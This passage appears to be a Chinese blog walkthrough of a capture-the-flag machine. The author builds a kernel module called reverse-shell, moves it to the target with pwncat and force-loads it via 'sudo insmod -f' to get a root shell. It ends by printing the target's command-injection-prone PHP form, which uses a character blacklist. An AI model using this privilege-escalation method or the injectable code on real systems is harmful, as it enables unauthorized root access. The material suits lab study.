/usr/share/bash-completion/completions/automake-1.15
/usr/share/bash-completion/completions/automake
/usr/share/nano/cmake.nanorc
/usr/share/nano/makefile.nanorc
/usr/share/console-setup/kbdnames-maker
也没有,反正有root了,直接联网下载!!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# sudo apt install make
(remote) root@todd:/tmp# uname -a
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
(remote) root@todd:/tmp# vim reverse-shell.c
(remote) root@todd:/tmp# vim Makefile
(remote) root@todd:/tmp# cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules$
$
clean:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean$
(remote) root@todd:/tmp# make
make -C /lib/modules/4.19.0-12-amd64/build M=/tmp modules
make[1]: *** /lib/modules/4.19.0-12-amd64/build: No such file or directory. Stop.
make: *** [Makefile:4: all] Error 2
。。。。。
1
2
(remote) root@todd:/tmp# ls /lib/modules/$(uname -r)/build
ls: cannot access '/lib/modules/4.19.0-12-amd64/build': No such file or directory
尝试下载https://github.com/stratum/sonic-base-image/releases/download/2022-08-12/linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(remote) root@todd:/tmp# sudo dpkg -i linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb
Selecting previously unselected package linux-headers-4.19.0-12-2-amd64.
(Reading database ... 40390 files and directories currently installed.)
Preparing to unpack linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb ...
Unpacking linux-headers-4.19.0-12-2-amd64 (4.19.152-1) ...
dpkg: dependency problems prevent configuration of linux-headers-4.19.0-12-2-amd64:
linux-headers-4.19.0-12-2-amd64 depends on linux-headers-4.19.0-12-2-common (= 4.19.152-1); however:
Package linux-headers-4.19.0-12-2-common is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-kbuild-4.19 (>= 4.19.152-1); however:
Package linux-kbuild-4.19 is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-compiler-gcc-8-x86; however:
Package linux-compiler-gcc-8-x86 is not installed.
dpkg: error processing package linux-headers-4.19.0-12-2-amd64 (--install):
dependency problems - leaving unconfigured
Errors were encountered while processing:
linux-headers-4.19.0-12-2-amd64
强制安装一手:
1
2
3
4
5
6
7
8
9
10
11
12
13
(remote) root@todd:/tmp# sudo dpkg -i --force-all linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb
(Reading database ... 48543 files and directories currently installed.)
Preparing to unpack linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb ...
Unpacking linux-headers-4.19.0-12-2-amd64 (4.19.152-1) over (4.19.152-1) ...
dpkg: linux-headers-4.19.0-12-2-amd64: dependency problems, but configuring anyway as you requested:
linux-headers-4.19.0-12-2-amd64 depends on linux-headers-4.19.0-12-2-common (= 4.19.152-1); however:
Package linux-headers-4.19.0-12-2-common is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-kbuild-4.19 (>= 4.19.152-1); however:
Package linux-kbuild-4.19 is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-compiler-gcc-8-x86; however:
Package linux-compiler-gcc-8-x86 is not installed.
Setting up linux-headers-4.19.0-12-2-amd64 (4.19.152-1) ...
然后继续!!!!!强制安装的后果就是啥也没解决。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
(remote) root@todd:/tmp# ls -la /lib/modules/
total 20
drwxr-xr-x 5 root root 4096 Jun 27 13:42 .
drwxr-xr-x 55 root root 4096 Feb 19 11:04 ..
drwxr-xr-x 2 root root 4096 Jun 27 13:44 4.19.0-12-2-amd64
drwxr-xr-x 3 root root 4096 Nov 13 2020 4.19.0-12-amd64
drwxr-xr-x 3 root root 4096 Nov 13 2020 4.19.0-9-amd64
(remote) root@todd:/tmp# ls -la /lib/modules/4.19.0-12-amd64/build
ls: cannot access '/lib/modules/4.19.0-12-amd64/build': No such file or directory
(remote) root@todd:/tmp# ls -la /lib/modules/4.19.0-12-amd64/
total 4456
drwxr-xr-x 3 root root 4096 Nov 13 2020 .
drwxr-xr-x 5 root root 4096 Jun 27 13:42 ..
drwxr-xr-x 12 root root 4096 Nov 13 2020 kernel
-rw-r--r-- 1 root root 1130658 Nov 13 2020 modules.alias
-rw-r--r-- 1 root root 1077543 Nov 13 2020 modules.alias.bin
-rw-r--r-- 1 root root 4683 Oct 18 2020 modules.builtin
-rw-r--r-- 1 root root 5999 Nov 13 2020 modules.builtin.bin
-rw-r--r-- 1 root root 434780 Nov 13 2020 modules.dep
-rw-r--r-- 1 root root 592745 Nov 13 2020 modules.dep.bin
-rw-r--r-- 1 root root 456 Nov 13 2020 modules.devname
-rw-r--r-- 1 root root 140056 Oct 18 2020 modules.order
-rw-r--r-- 1 root root 800 Nov 13 2020 modules.softdep
-rw-r--r-- 1 root root 506751 Nov 13 2020 modules.symbols
-rw-r--r-- 1 root root 625597 Nov 13 2020 modules.symbols.bin
尝试相近版本内核
还是没有目标。。。。尝试不下载这个版本换一个相近的版本。。。。
1
2
3
4
5
6
7
8
9
apt install linux-headers-4.19.0-12-amd64
apt install linux-headers-4.19.0-13-amd64
apt install linux-headers-4.19.0-14-amd64
apt install linux-headers-4.19.0-15-amd64
apt install linux-headers-4.19.0-16-amd64
apt install linux-headers-4.19.0-17-amd64
apt install linux-headers-4.19.0-18-amd64
apt install linux-headers-4.19.0-19-amd64
apt install linux-headers-4.19.0-20-amd64
最后一个可以,再不行我要写个脚本爆破了。。。。
然后完整步骤就是这样:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
(remote) root@todd:/tmp# apt install linux-headers-4.19.0-20-amd64
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
linux-compiler-gcc-8-x86 linux-headers-4.19.0-20-common linux-kbuild-4.19
The following NEW packages will be installed:
linux-compiler-gcc-8-x86 linux-headers-4.19.0-20-amd64 linux-headers-4.19.0-20-common linux-kbuild-4.19
0 upgraded, 4 newly installed, 0 to remove and 135 not upgraded.
Need to get 11.3 MB of archives.
After this operation, 58.9 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 https://mirrors.tuna.tsinghua.edu.cn/debian-security buster/updates/main amd64 linux-compiler-gcc-8-x86 amd64 4.19.316-1 [707 kB]
Get:2 https://mirrors.tuna.tsinghua.edu.cn/debian buster/main amd64 linux-headers-4.19.0-20-common all 4.19.235-1 [8,545 kB]
Get:3 https://mirrors.tuna.tsinghua.edu.cn/debian-security buster/updates/main amd64 linux-kbuild-4.19 amd64 4.19.316-1 [941 kB]
Get:4 https://mirrors.tuna.tsinghua.edu.cn/debian buster/main amd64 linux-headers-4.19.0-20-amd64 amd64 4.19.235-1 [1,075 kB]
Fetched 11.3 MB in 1s (14.1 MB/s)
Selecting previously unselected package linux-compiler-gcc-8-x86.
(Reading database ... 40348 files and directories currently installed.)
Preparing to unpack .../linux-compiler-gcc-8-x86_4.19.316-1_amd64.deb ...
Unpacking linux-compiler-gcc-8-x86 (4.19.316-1) ...
Selecting previously unselected package linux-headers-4.19.0-20-common.
Preparing to unpack .../linux-headers-4.19.0-20-common_4.19.235-1_all.deb ...
Unpacking linux-headers-4.19.0-20-common (4.19.235-1) ...
Selecting previously unselected package linux-kbuild-4.19.
Preparing to unpack .../linux-kbuild-4.19_4.19.316-1_amd64.deb ...
Unpacking linux-kbuild-4.19 (4.19.316-1) ...
Selecting previously unselected package linux-headers-4.19.0-20-amd64.
Preparing to unpack .../linux-headers-4.19.0-20-amd64_4.19.235-1_amd64.deb ...
Unpacking linux-headers-4.19.0-20-amd64 (4.19.235-1) ...
Setting up linux-compiler-gcc-8-x86 (4.19.316-1) ...
Setting up linux-kbuild-4.19 (4.19.316-1) ...
Setting up linux-headers-4.19.0-20-common (4.19.235-1) ...
Setting up linux-headers-4.19.0-20-amd64 (4.19.235-1) ...
(remote) root@todd:/tmp# ls -la /lib/modules/4.19.0-20-amd64/build
lrwxrwxrwx 1 root root 38 Mar 17 2022 /lib/modules/4.19.0-20-amd64/build -> /usr/src/linux-headers-4.19.0-20-amd64
(remote) root@todd:/tmp# vim reverse-shell.c
(remote) root@todd:/tmp# chmod +x *
(remote) root@todd:/tmp# vim Makefile
(remote) root@todd:/tmp# cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules$
$
clean:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean$
(remote) root@todd:/tmp# sudo apt install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
make-doc
The following NEW packages will be installed:
make
0 upgraded, 1 newly installed, 0 to remove and 135 not upgraded.
Need to get 341 kB of archives.
After this operation, 1,327 kB of additional disk space will be used.
Get:1 https://mirrors.tuna.tsinghua.edu.cn/debian buster/main amd64 make amd64 4.2.1-1.2 [341 kB]
Fetched 341 kB in 0s (1,017 kB/s)
Selecting previously unselected package make.
(Reading database ... 57718 files and directories currently installed.)
Preparing to unpack .../make_4.2.1-1.2_amd64.deb ...
Unpacking make (4.2.1-1.2) ...
Setting up make (4.2.1-1.2) ...
Processing triggers for man-db (2.8.5-2) ...
(remote) root@todd:/tmp# make
make -C /lib/modules/4.19.0-12-amd64/build M=/tmp modules
make[1]: *** /lib/modules/4.19.0-12-amd64/build: No such file or directory. Stop.
make: *** [Makefile:4: all] Error 2
(remote) root@todd:/tmp# vim Makefile
(remote) root@todd:/tmp# cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/4.19.0-20-amd64/build M=$(PWD) modules$
clean:$
^Imake -C /lib/modules/4.19.0-20-amd64/build M=$(PWD) clean$
(remote) root@todd:/tmp# make
make -C /lib/modules/4.19.0-20-amd64/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.19.0-20-amd64'
CC [M] /tmp/reverse-shell.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/reverse-shell.mod.o
LD [M] /tmp/reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.19.0-20-amd64'
成了!!!!道爷我成了!!!!啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊,下载到本地,猛攻!!!!!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
(remote) root@todd:/tmp# ls -la
total 716
drwxrwxrwt 10 root root 4096 Jun 27 14:22 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .font-unix
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .ICE-unix
-rw-r--r-- 1 root root 157 Jun 27 14:22 Makefile
-rw-r--r-- 1 root root 29 Jun 27 14:22 modules.order
-rw-r--r-- 1 root root 0 Jun 27 14:22 Module.symvers
-rwxr-xr-x 1 root root 712 Jun 27 14:20 reverse-shell.c
-rw-r--r-- 1 root root 279960 Jun 27 14:22 reverse-shell.ko
-rw-r--r-- 1 root root 237 Jun 27 14:22 .reverse-shell.ko.cmd
-rw-r--r-- 1 root root 883 Jun 27 14:22 reverse-shell.mod.c
-rw-r--r-- 1 root root 140280 Jun 27 14:22 reverse-shell.mod.o
-rw-r--r-- 1 root root 49174 Jun 27 14:22 .reverse-shell.mod.o.cmd
-rw-r--r-- 1 root root 141200 Jun 27 14:22 reverse-shell.o
-rw-r--r-- 1 root root 48846 Jun 27 14:22 .reverse-shell.o.cmd
drwx--x--x 3 root root 4096 Jun 27 14:15 systemd-private-981b29ebdea144e980609337611df08b-apache2.service-L6WvPd
drwx--x--x 3 root root 4096 Jun 27 14:15 systemd-private-981b29ebdea144e980609337611df08b-systemd-timesyncd.service-hJzwPy
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .Test-unix
drwxr-xr-x 2 root root 4096 Jun 27 14:22 .tmp_versions
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .X11-unix
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .XIM-unix
(remote) root@todd:/tmp#
(local) pwncat$ lpwd
/home/kali/temp/Todd
(local) pwncat$ lcd ../Troya
(local) pwncat$ download reverse-shell.ko
reverse-shell.ko ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 280.0/280.0 KB • ? • 0:00:00[14:24:45] downloaded 279.96KiB in 0.41 seconds
猛攻!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1
2
3
4
5
6
7
8
(remote) helena@troya:/tmp$
(local) pwncat$ upload reverse-shell.ko
./reverse-shell.ko ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 280.0/280.0 KB • ? • 0:00:00[14:31:37] uploaded 279.96KiB in 0.31 seconds upload.py:76
(local) pwncat$
(remote) helena@troya:/tmp$ chmod +x *
chmod: changing permissions of 'systemd-private-bcd14e7627754f2cb355070e6a82b6ea-systemd-timesyncd.service-4SITWq': Operation not permitted
(remote) helena@troya:/tmp$ sudo /usr/sbin/insmod reverse-shell.ko
insmod: ERROR: could not insert module reverse-shell.ko: Invalid module format
裤子脱了你和我说这个!!!直接强行下载模组使用-f参数!!!!!
1
(remote) helena@troya:/tmp$ sudo /usr/sbin/insmod -f reverse-shell.ko
拿下rootshell!!!!!
一些信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
(remote) www-data@troya:/var/www/html$ cat index.php
<html>
<body>
<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
Enter ip: <input type="text" name="command">
<input type="submit">
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$command = $_POST['command'];
$blacklistchars = '"%\'*iash;<>^`{}~\\#=&';
if (preg_match('/[' . $blacklistchars . ']/', $command)) {
echo ("No valid character detected");
} else {
$cmd = 'host '.$command;
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
}
}
?>
</body>
</html>
本文由作者按照 CC BY 4.0 进行授权